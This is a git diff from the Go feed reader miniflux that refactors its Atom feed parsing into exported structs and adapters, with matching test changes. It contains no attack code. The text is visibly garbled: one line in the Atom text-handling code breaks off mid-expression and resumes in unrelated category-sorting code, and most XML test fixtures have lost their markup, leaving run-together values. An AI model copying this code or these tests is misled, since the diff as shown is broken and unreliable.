+ // atom:feed elements MUST contain exactly one atom:id element.
+ ID string `xml:"http://www.w3.org/2005/Atom id"`
+
+ // The "atom:title" element is a Text construct that conveys a human-
+ // readable title for an entry or feed.
+ //
+ // atom:feed elements MUST contain exactly one atom:title element.
+ Title Atom10Text `xml:"http://www.w3.org/2005/Atom title"`
+
+ // The "atom:author" element is a Person construct that indicates the
+ // author of the entry or feed.
+ //
+ // atom:feed elements MUST contain one or more atom:author elements,
+ // unless all of the atom:feed element's child atom:entry elements
+ // contain at least one atom:author element.
+ Authors AtomPersons `xml:"http://www.w3.org/2005/Atom author"`
+
+ // The "atom:icon" element's content is an IRI reference [RFC3987] that
+ // identifies an image that provides iconic visual identification for a
+ // feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:icon element.
+ Icon string `xml:"http://www.w3.org/2005/Atom icon"`
+
+ // The "atom:logo" element's content is an IRI reference [RFC3987] that
+ // identifies an image that provides visual identification for a feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:logo element.
+ Logo string `xml:"http://www.w3.org/2005/Atom logo"`
+
+ // atom:feed elements SHOULD contain one atom:link element with a rel
+ // attribute value of "self". This is the preferred URI for
+ // retrieving Atom Feed Documents representing this Atom feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:link
+ // element with a rel attribute value of "alternate" that has the
+ // same combination of type and hreflang attribute values.
+ Links AtomLinks `xml:"http://www.w3.org/2005/Atom link"`
+
+ // The "atom:category" element conveys information about a category
+ // associated with an entry or feed. This specification assigns no
+ // meaning to the content (if any) of this element.
+ //
+ // atom:feed elements MAY contain any number of atom:category
+ // elements.
+ Categories AtomCategories `xml:"http://www.w3.org/2005/Atom category"`
+
+ Entries []Atom10Entry `xml:"http://www.w3.org/2005/Atom entry"`
}
-func (a *atom10Feed) Transform(baseURL string) *model.Feed {
- var err error
+type Atom10Entry struct {
+ // The "atom:id" element conveys a permanent, universally unique
+ // identifier for an entry or feed.
+ //
+ // Its content MUST be an IRI, as defined by [RFC3987]. Note that the
+ // definition of "IRI" excludes relative references. Though the IRI
+ // might use a dereferencable scheme, Atom Processors MUST NOT assume it
+ // can be dereferenced.
+ //
+ // atom:entry elements MUST contain exactly one atom:id element.
+ ID string `xml:"http://www.w3.org/2005/Atom id"`
- feed := new(model.Feed)
+ // The "atom:title" element is a Text construct that conveys a human-
+ // readable title for an entry or feed.
+ //
+ // atom:entry elements MUST contain exactly one atom:title element.
+ Title Atom10Text `xml:"http://www.w3.org/2005/Atom title"`
- feedURL := a.Links.firstLinkWithRelation("self")
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
+ // The "atom:published" element is a Date construct indicating an
+ // instant in time associated with an event early in the life cycle of
+ // the entry.
+ Published string `xml:"http://www.w3.org/2005/Atom published"`
- siteURL := a.Links.originalLink()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
+ // The "atom:updated" element is a Date construct indicating the most
+ // recent instant in time when an entry or feed was modified in a way
+ // the publisher considers significant. Therefore, not all
+ // modifications necessarily result in a changed atom:updated value.
+ //
+ // atom:entry elements MUST contain exactly one atom:updated element.
+ Updated string `xml:"http://www.w3.org/2005/Atom updated"`
- feed.Title = html.UnescapeString(a.Title.String())
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
+ // atom:entry elements MUST NOT contain more than one atom:link
+ // element with a rel attribute value of "alternate" that has the
+ // same combination of type and hreflang attribute values.
+ Links AtomLinks `xml:"http://www.w3.org/2005/Atom link"`
- feed.IconURL = strings.TrimSpace(a.Icon)
+ // atom:entry elements MUST contain an atom:summary element in either
+ // of the following cases:
+ // * the atom:entry contains an atom:content that has a "src"
+ // attribute (and is thus empty).
+ // * the atom:entry contains content that is encoded in Base64;
+ // i.e., the "type" attribute of atom:content is a MIME media type
+ // [MIMEREG], but is not an XML media type [RFC3023], does not
+ // begin with "text/", and does not end with "/xml" or "+xml".
+ //
+ // atom:entry elements MUST NOT contain more than one atom:summary
+ // element.
+ Summary Atom10Text `xml:"http://www.w3.org/2005/Atom summary"`
- for _, entry := range a.Entries {
- item := entry.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, item.URL)
- if err == nil {
- item.URL = entryURL
- }
+ // atom:entry elements MUST NOT contain more than one atom:content
+ // element.
+ Content Atom10Text `xml:"http://www.w3.org/2005/Atom content"`
- if item.Author == "" {
- item.Author = a.Authors.String()
- }
+ // The "atom:author" element is a Person construct that indicates the
+ // author of the entry or feed.
+ //
+ // atom:entry elements MUST contain one or more atom:author elements
+ Authors AtomPersons `xml:"http://www.w3.org/2005/Atom author"`
- if item.Title == "" {
- item.Title = sanitizer.TruncateHTML(item.Content, 100)
- }
+ // The "atom:category" element conveys information about a category
+ // associated with an entry or feed. This specification assigns no
+ // meaning to the content (if any) of this element.
+ //
+ // atom:entry elements MAY contain any number of atom:category
+ // elements.
+ Categories AtomCategories `xml:"http://www.w3.org/2005/Atom category"`
- if item.Title == "" {
- item.Title = item.URL
- }
-
- feed.Entries = append(feed.Entries, item)
- }
-
- return feed
-}
-
-type atom10Entry struct {
- ID string `xml:"id"`
- Title atom10Text `xml:"title"`
- Published string `xml:"published"`
- Updated string `xml:"updated"`
- Links atomLinks `xml:"link"`
- Summary atom10Text `xml:"summary"`
- Content atom10Text `xml:"http://www.w3.org/2005/Atom content"`
- Authors atomAuthors `xml:"author"`
- Categories []atom10Category `xml:"category"`
media.MediaItemElement
}
-func (a *atom10Entry) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = a.Links.originalLink()
- entry.Date = a.entryDate()
- entry.Author = a.Authors.String()
- entry.Hash = a.entryHash()
- entry.Content = a.entryContent()
- entry.Title = a.entryTitle()
- entry.Enclosures = a.entryEnclosures()
- entry.CommentsURL = a.entryCommentsURL()
- entry.Tags = a.entryCategories()
- return entry
-}
-
-func (a *atom10Entry) entryTitle() string {
- return html.UnescapeString(a.Title.String())
-}
-
-func (a *atom10Entry) entryContent() string {
- content := a.Content.String()
- if content != "" {
- return content
- }
-
- summary := a.Summary.String()
- if summary != "" {
- return summary
- }
-
- mediaDescription := a.FirstMediaDescription()
- if mediaDescription != "" {
- return mediaDescription
- }
-
- return ""
-}
-
-// Note: The published date represents the original creation date for YouTube feeds.
-// Example:
-// 2019-01-26T08:02:28+00:00
-// 2019-01-29T07:27:27+00:00
-func (a *atom10Entry) entryDate() time.Time {
- dateText := a.Published
- if dateText == "" {
- dateText = a.Updated
- }
-
- if dateText != "" {
- result, err := date.Parse(dateText)
- if err != nil {
- slog.Debug("Unable to parse date from Atom 0.3 feed",
- slog.String("date", dateText),
- slog.String("id", a.ID),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (a *atom10Entry) entryHash() string {
- for _, value := range []string{a.ID, a.Links.originalLink()} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-func (a *atom10Entry) entryEnclosures() model.EnclosureList {
- enclosures := make(model.EnclosureList, 0)
- duplicates := make(map[string]bool)
-
- for _, mediaThumbnail := range a.AllMediaThumbnails() {
- if _, found := duplicates[mediaThumbnail.URL]; !found {
- duplicates[mediaThumbnail.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaThumbnail.URL,
- MimeType: mediaThumbnail.MimeType(),
- Size: mediaThumbnail.Size(),
- })
- }
- }
-
- for _, link := range a.Links {
- if strings.EqualFold(link.Rel, "enclosure") {
- if link.URL == "" {
- continue
- }
-
- if _, found := duplicates[link.URL]; !found {
- duplicates[link.URL] = true
- length, _ := strconv.ParseInt(link.Length, 10, 0)
- enclosures = append(enclosures, &model.Enclosure{URL: link.URL, MimeType: link.Type, Size: length})
- }
- }
- }
-
- for _, mediaContent := range a.AllMediaContents() {
- if _, found := duplicates[mediaContent.URL]; !found {
- duplicates[mediaContent.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaContent.URL,
- MimeType: mediaContent.MimeType(),
- Size: mediaContent.Size(),
- })
- }
- }
-
- for _, mediaPeerLink := range a.AllMediaPeerLinks() {
- if _, found := duplicates[mediaPeerLink.URL]; !found {
- duplicates[mediaPeerLink.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaPeerLink.URL,
- MimeType: mediaPeerLink.MimeType(),
- Size: mediaPeerLink.Size(),
- })
- }
- }
-
- return enclosures
-}
-
-func (r *atom10Entry) entryCategories() []string {
- categoryList := make([]string, 0)
-
- for _, atomCategory := range r.Categories {
- if strings.TrimSpace(atomCategory.Label) != "" {
- categoryList = append(categoryList, strings.TrimSpace(atomCategory.Label))
- } else {
- categoryList = append(categoryList, strings.TrimSpace(atomCategory.Term))
- }
- }
-
- return categoryList
-}
-
-// See https://tools.ietf.org/html/rfc4685#section-4
-// If the type attribute of the atom:link is omitted, its value is assumed to be "application/atom+xml".
-// We accept only HTML or XHTML documents for now since the intention is to have the same behavior as RSS.
-func (a *atom10Entry) entryCommentsURL() string {
- commentsURL := a.Links.firstLinkWithRelationAndType("replies", "text/html", "application/xhtml+xml")
- if urllib.IsAbsoluteURL(commentsURL) {
- return commentsURL
- }
- return ""
-}
-
-type atom10Text struct {
- Type string `xml:"type,attr"`
- CharData string `xml:",chardata"`
- InnerXML string `xml:",innerxml"`
- XHTMLRootElement atomXHTMLRootElement `xml:"http://www.w3.org/1999/xhtml div"`
-}
-
-type atom10Category struct {
- Term string `xml:"term,attr"`
- Label string `xml:"label,attr"`
-}
-
+// A Text construct contains human-readable text, usually in small
+// quantities. The content of Text constructs is Language-Sensitive.
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1
// Text: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.1
// HTML: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.2
// XHTML: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.3
-func (a *atom10Text) String() string {
+type Atom10Text struct {
+ Type string `xml:"type,attr"`
+ CharData string `xml:",chardata"`
+ InnerXML string `xml:",innerxml"`
+ XHTMLRootElement AtomXHTMLRootElement `xml:"http://www.w3.org/1999/xhtml div"`
+}
+
+func (a *Atom10Text) Body() string {
var content string
- switch {
- case a.Type == "", a.Type == "text", a.Type == "text/plain":
- if strings.HasPrefix(strings.TrimSpace(a.InnerXML), ` 0 {
+ sort.Strings(categories) // Sort first: slices.Compact only removes adjacent duplicates.
+ categories = slices.Compact(categories)
+ entry.Tags = categories
+ }
+
+ // Populate the commentsURL if defined.
+ // See https://tools.ietf.org/html/rfc4685#section-4
+ // If the type attribute of the atom:link is omitted, its value is assumed to be "application/atom+xml".
+ // We accept only HTML or XHTML documents for now since the intention is to have the same behavior as RSS.
+ commentsURL := atomEntry.Links.firstLinkWithRelationAndType("replies", "text/html", "application/xhtml+xml")
+ if urllib.IsAbsoluteURL(commentsURL) {
+ entry.CommentsURL = commentsURL
+ }
+
+ // Generate the entry hash.
+ for _, value := range []string{atomEntry.ID, atomEntry.Links.OriginalLink()} {
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ // Populate the entry enclosures.
+ uniqueEnclosuresMap := make(map[string]bool)
+
+ for _, mediaThumbnail := range atomEntry.AllMediaThumbnails() {
+ if _, found := uniqueEnclosuresMap[mediaThumbnail.URL]; !found {
+ uniqueEnclosuresMap[mediaThumbnail.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaThumbnail.URL,
+ MimeType: mediaThumbnail.MimeType(),
+ Size: mediaThumbnail.Size(),
+ })
+ }
+ }
+
+ for _, link := range atomEntry.Links {
+ if strings.EqualFold(link.Rel, "enclosure") {
+ if link.Href == "" {
+ continue
+ }
+
+ if _, found := uniqueEnclosuresMap[link.Href]; !found {
+ uniqueEnclosuresMap[link.Href] = true
+ length, _ := strconv.ParseInt(link.Length, 10, 0)
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: link.Href,
+ MimeType: link.Type,
+ Size: length,
+ })
+ }
+ }
+ }
+
+ for _, mediaContent := range atomEntry.AllMediaContents() {
+ if _, found := uniqueEnclosuresMap[mediaContent.URL]; !found {
+ uniqueEnclosuresMap[mediaContent.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaContent.URL,
+ MimeType: mediaContent.MimeType(),
+ Size: mediaContent.Size(),
+ })
+ }
+ }
+
+ for _, mediaPeerLink := range atomEntry.AllMediaPeerLinks() {
+ if _, found := uniqueEnclosuresMap[mediaPeerLink.URL]; !found {
+ uniqueEnclosuresMap[mediaPeerLink.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaPeerLink.URL,
+ MimeType: mediaPeerLink.MimeType(),
+ Size: mediaPeerLink.Size(),
+ })
+ }
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
diff --git a/internal/reader/atom/atom_10_test.go b/internal/reader/atom/atom_10_test.go
index f778e8e6..be6e9148 100644
--- a/internal/reader/atom/atom_10_test.go
+++ b/internal/reader/atom/atom_10_test.go
@@ -12,7 +12,6 @@ import (
func TestParseAtomSample(t *testing.T) {
data := `
-
Example Feed2003-12-13T18:30:02Z
@@ -20,7 +19,6 @@ func TestParseAtomSample(t *testing.T) {
John Doeurn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6
-
Atom-Powered Robots Run Amok
@@ -28,7 +26,6 @@ func TestParseAtomSample(t *testing.T) {
2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("http://example.org/feed.xml", bytes.NewReader([]byte(data)), "10")
@@ -420,7 +417,7 @@ func TestParseEntryWithPlainTextTitle(t *testing.T) {
expected := `AT&T bought by SBC!`
for i := range 2 {
if feed.Entries[i].Title != expected {
- t.Errorf("Incorrect title for entry #%d, got: %q", i, feed.Entries[i].Title)
+ t.Errorf("Incorrect title for entry #%d, got: %q instead of %q", i, feed.Entries[i].Title, expected)
}
}
}
@@ -430,33 +427,20 @@ func TestParseEntryWithHTMLTitle(t *testing.T) {
Example Feed
-
- <code>Test</code> Test
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+ <code>Code</code> Test
+
-
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+
+
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -464,11 +448,11 @@ func TestParseEntryWithHTMLTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != "Test Test" {
+ if feed.Entries[0].Title != "Code Test" {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
- if feed.Entries[1].Title != "Test “Test”" {
+ if feed.Entries[1].Title != "Test with “unicode quote”" {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[1].Title)
}
@@ -502,8 +486,8 @@ func TestParseEntryWithXHTMLTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != `This is XHTML content.` {
- t.Errorf("Incorrect entry title, got: %q", feed.Entries[1].Title)
+ if feed.Entries[0].Title != `This is XHTML content.` {
+ t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
}
@@ -608,7 +592,7 @@ func TestParseEntryWithDoubleEncodedEntitiesTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != `'AT&T'` {
+ if feed.Entries[0].Title != `'AT&T'` {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
}
@@ -644,31 +628,21 @@ func TestParseEntryWithHTMLSummary(t *testing.T) {
Example Feed
-
- Example
+ Example 1
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- <code>std::unique_ptr<S></code>
+ <code>std::unique_ptr<S> myvar;</code>
-
- Example
+ Example 2
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- <code>std::unique_ptr<S></code>
+ <code>std::unique_ptr<S> myvar;</code>
-
- Example
+ Example 3
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- std::unique_ptr<S>]]>
+ std::unique_ptr<S> myvar;]]>
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -676,7 +650,11 @@ func TestParseEntryWithHTMLSummary(t *testing.T) {
t.Fatal(err)
}
- expected := `std::unique_ptr<S>`
+ if len(feed.Entries) != 3 {
+ t.Fatalf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ expected := `std::unique_ptr<S> myvar;`
for i := range 3 {
if feed.Entries[i].Content != expected {
t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
@@ -728,7 +706,7 @@ func TestParseEntryWithTextSummary(t *testing.T) {
t.Fatal(err)
}
- expected := `AT&T <S>`
+ expected := `AT&T `
for i := range 4 {
if feed.Entries[i].Content != expected {
t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
@@ -747,7 +725,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -755,7 +733,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -763,7 +741,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -771,7 +749,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- ]]>
+ Strong Element]]>`
@@ -781,10 +759,10 @@ func TestParseEntryWithTextContent(t *testing.T) {
t.Fatal(err)
}
- expected := `AT&T <S>`
+ expected := `AT&T Strong Element`
for i := range 4 {
if feed.Entries[i].Content != expected {
- t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
+ t.Errorf("Incorrect content for entry #%d, got: %q instead of %q", i, feed.Entries[i].Content, expected)
}
}
}
@@ -925,7 +903,6 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
Example Feed
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
@@ -938,7 +915,6 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
Bob
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -951,7 +927,7 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
}
}
-func TestParseEntryWithoutAuthor(t *testing.T) {
+func TestParseFeedWithEntryWithoutAuthor(t *testing.T) {
data := `
Example Feed
@@ -959,14 +935,12 @@ func TestParseEntryWithoutAuthor(t *testing.T) {
John Doe
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -990,14 +964,15 @@ func TestParseFeedWithMultipleAuthors(t *testing.T) {
Bob
-
+
+ Bob
+ urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1015,14 +990,12 @@ func TestParseFeedWithoutAuthor(t *testing.T) {
Example Feed
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1608,27 +1581,18 @@ func TestAbsoluteCommentsURL(t *testing.T) {
}
}
-func TestParseFeedWithCategories(t *testing.T) {
+func TestParseItemWithCategories(t *testing.T) {
data := `
Example Feed
-
- Alice
-
-
- Bob
-
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
+
2003-12-13T18:30:02ZSome text.
-
+
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1637,22 +1601,53 @@ func TestParseFeedWithCategories(t *testing.T) {
}
if len(feed.Entries[0].Tags) != 2 {
- t.Errorf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ t.Fatalf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
}
- expected := "Tech"
+ expected := "Science"
result := feed.Entries[0].Tags[0]
if result != expected {
t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
}
- expected = "Science"
+ expected = "ZZZZ"
result = feed.Entries[0].Tags[1]
if result != expected {
t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
}
}
+func TestParseFeedWithCategories(t *testing.T) {
+ data := `
+
+ Example Feed
+
+
+
+
+
+
+ 2003-12-13T18:30:02Z
+ Some text.
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries[0].Tags) != 1 {
+ t.Fatalf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ }
+
+ expected := "Some Label"
+ result := feed.Entries[0].Tags[0]
+ if result != expected {
+ t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
+ }
+}
+
func TestParseFeedWithIconURL(t *testing.T) {
data := `
diff --git a/internal/reader/atom/atom_common.go b/internal/reader/atom/atom_common.go
index 4b283d44..debd46f1 100644
--- a/internal/reader/atom/atom_common.go
+++ b/internal/reader/atom/atom_common.go
@@ -3,77 +3,91 @@
package atom // import "miniflux.app/v2/internal/reader/atom"
-import "strings"
+import (
+ "strings"
+)
-type atomPerson struct {
- Name string `xml:"name"`
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-3.2
+type AtomPerson struct {
+ // The "atom:name" element's content conveys a human-readable name for the author.
+ // It MAY be the name of a corporation or other entity if no individual authors can be named.
+ // Person constructs MUST contain exactly one "atom:name" element, whose content MUST be a string.
+ Name string `xml:"name"`
+
+ // The "atom:email" element's content conveys an e-mail address associated with the Person construct.
+ // Person constructs MAY contain an atom:email element, but MUST NOT contain more than one.
+ // Its content MUST be an e-mail address [RFC2822].
+ // Ordering of the element children of Person constructs MUST NOT be considered significant.
Email string `xml:"email"`
}
-func (a *atomPerson) String() string {
- name := ""
-
- switch {
- case a.Name != "":
- name = a.Name
- case a.Email != "":
- name = a.Email
+func (a *AtomPerson) PersonName() string {
+ name := strings.TrimSpace(a.Name)
+ if name != "" {
+ return name
}
- return strings.TrimSpace(name)
+ return strings.TrimSpace(a.Email)
}
-type atomAuthors []*atomPerson
+type AtomPersons []*AtomPerson
-func (a atomAuthors) String() string {
- var authors []string
+func (a AtomPersons) PersonNames() []string {
+ var names []string
+ authorNamesMap := make(map[string]bool)
for _, person := range a {
- authors = append(authors, person.String())
+ personName := person.PersonName()
+ if _, ok := authorNamesMap[personName]; !ok && personName != "" { // Skip persons with neither a name nor an email.
+ names = append(names, personName)
+ authorNamesMap[personName] = true
+ }
}
- return strings.Join(authors, ", ")
+ return names
}
-type atomLink struct {
- URL string `xml:"href,attr"`
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-4.2.7
+type AtomLink struct {
+ Href string `xml:"href,attr"`
Type string `xml:"type,attr"`
Rel string `xml:"rel,attr"`
Length string `xml:"length,attr"`
+ Title string `xml:"title,attr"`
}
-type atomLinks []*atomLink
+type AtomLinks []*AtomLink
-func (a atomLinks) originalLink() string {
+func (a AtomLinks) OriginalLink() string {
for _, link := range a {
if strings.EqualFold(link.Rel, "alternate") {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
if link.Rel == "" && (link.Type == "" || link.Type == "text/html") {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
return ""
}
-func (a atomLinks) firstLinkWithRelation(relation string) string {
+func (a AtomLinks) firstLinkWithRelation(relation string) string {
for _, link := range a {
if strings.EqualFold(link.Rel, relation) {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
return ""
}
-func (a atomLinks) firstLinkWithRelationAndType(relation string, contentTypes ...string) string {
+func (a AtomLinks) firstLinkWithRelationAndType(relation string, contentTypes ...string) string {
for _, link := range a {
if strings.EqualFold(link.Rel, relation) {
for _, contentType := range contentTypes {
if strings.EqualFold(link.Type, contentType) {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
}
@@ -81,3 +95,46 @@ func (a atomLinks) firstLinkWithRelationAndType(relation string, contentTypes ..
return ""
}
+
+// The "atom:category" element conveys information about a category
+// associated with an entry or feed. This specification assigns no
+// meaning to the content (if any) of this element.
+//
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-4.2.2
+type AtomCategory struct {
+ // The "term" attribute is a string that identifies the category to
+ // which the entry or feed belongs. Category elements MUST have a
+ // "term" attribute.
+ Term string `xml:"term,attr"`
+
+ // The "scheme" attribute is an IRI that identifies a categorization
+ // scheme. Category elements MAY have a "scheme" attribute.
+ Scheme string `xml:"scheme,attr"`
+
+ // The "label" attribute provides a human-readable label for display in
+ // end-user applications. The content of the "label" attribute is
+ // Language-Sensitive. Entities such as "&amp;" and "&lt;" represent
+ // their corresponding characters ("&" and "<", respectively), not
+ // markup. Category elements MAY have a "label" attribute.
+ Label string `xml:"label,attr"`
+}
+
+type AtomCategories []AtomCategory
+
+func (ac AtomCategories) CategoryNames() []string {
+ var categories []string
+
+ for _, category := range ac {
+ label := strings.TrimSpace(category.Label)
+ if label != "" {
+ categories = append(categories, label)
+ } else {
+ term := strings.TrimSpace(category.Term)
+ if term != "" {
+ categories = append(categories, term)
+ }
+ }
+ }
+
+ return categories
+}
diff --git a/internal/reader/atom/parser.go b/internal/reader/atom/parser.go
index 55c17ee5..f97985bc 100644
--- a/internal/reader/atom/parser.go
+++ b/internal/reader/atom/parser.go
@@ -11,22 +11,20 @@ import (
xml_decoder "miniflux.app/v2/internal/reader/xml"
)
-type atomFeed interface {
- Transform(baseURL string) *model.Feed
-}
-
// Parse returns a normalized feed struct from a Atom feed.
func Parse(baseURL string, r io.ReadSeeker, version string) (*model.Feed, error) {
- var rawFeed atomFeed
- if version == "0.3" {
- rawFeed = new(atom03Feed)
- } else {
- rawFeed = new(atom10Feed)
+ switch version {
+ case "0.3":
+ atomFeed := new(Atom03Feed)
+ if err := xml_decoder.NewXMLDecoder(r).Decode(atomFeed); err != nil {
+ return nil, fmt.Errorf("atom: unable to parse Atom 0.3 feed: %w", err)
+ }
+ return NewAtom03Adapter(atomFeed).BuildFeed(baseURL), nil
+ default:
+ atomFeed := new(Atom10Feed)
+ if err := xml_decoder.NewXMLDecoder(r).Decode(atomFeed); err != nil {
+ return nil, fmt.Errorf("atom: unable to parse Atom 1.0 feed: %w", err)
+ }
+ return NewAtom10Adapter(atomFeed).BuildFeed(baseURL), nil
}
-
- if err := xml_decoder.NewXMLDecoder(r).Decode(rawFeed); err != nil {
- return nil, fmt.Errorf("atom: unable to parse feed: %w", err)
- }
-
- return rawFeed.Transform(baseURL), nil
}
diff --git a/internal/reader/json/adapter.go b/internal/reader/json/adapter.go
index d62ff976..9e577d3e 100644
--- a/internal/reader/json/adapter.go
+++ b/internal/reader/json/adapter.go
@@ -98,7 +98,6 @@ func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
}
// Populate the entry date.
- entry.Date = time.Now()
for _, value := range []string{item.DatePublished, item.DateModified} {
value = strings.TrimSpace(value)
if value != "" {
@@ -114,6 +113,9 @@ func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
}
}
}
+ if entry.Date.IsZero() {
+ entry.Date = time.Now()
+ }
// Populate the entry author.
itemAuthors := append(item.Authors, j.jsonFeed.Authors...)
diff --git a/internal/reader/parser/parser_test.go b/internal/reader/parser/parser_test.go
index 447f73d3..9ab55a0c 100644
--- a/internal/reader/parser/parser_test.go
+++ b/internal/reader/parser/parser_test.go
@@ -85,7 +85,35 @@ func FuzzParse(f *testing.F) {
})
}
-func TestParseAtom(t *testing.T) {
+func TestParseAtom03Feed(t *testing.T) {
+ data := `
+
+ dive into mark
+
+ 2003-12-13T18:30:02Z
+ Mark Pilgrim
+
+ Atom 0.3 snapshot
+
+ tag:diveintomark.org,2003:3.2397
+ 2003-12-13T08:29:29-04:00
+ 2003-12-13T18:30:02Z
+ It's a test
+ HTML content]]>
+
+ `
+
+ feed, err := ParseFeed("https://example.org/", strings.NewReader(data))
+ if err != nil {
+ t.Error(err)
+ }
+
+ if feed.Title != "dive into mark" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseAtom10Feed(t *testing.T) {
data := `
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index fe1eed80..2909fc6b 100644
--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -69,7 +69,6 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
for _, item := range r.rss.Channel.Items {
entry := model.NewEntry()
- entry.Author = findEntryAuthor(&item)
entry.Date = findEntryDate(&item)
entry.Content = findEntryContent(&item)
entry.Enclosures = findEntryEnclosures(&item)
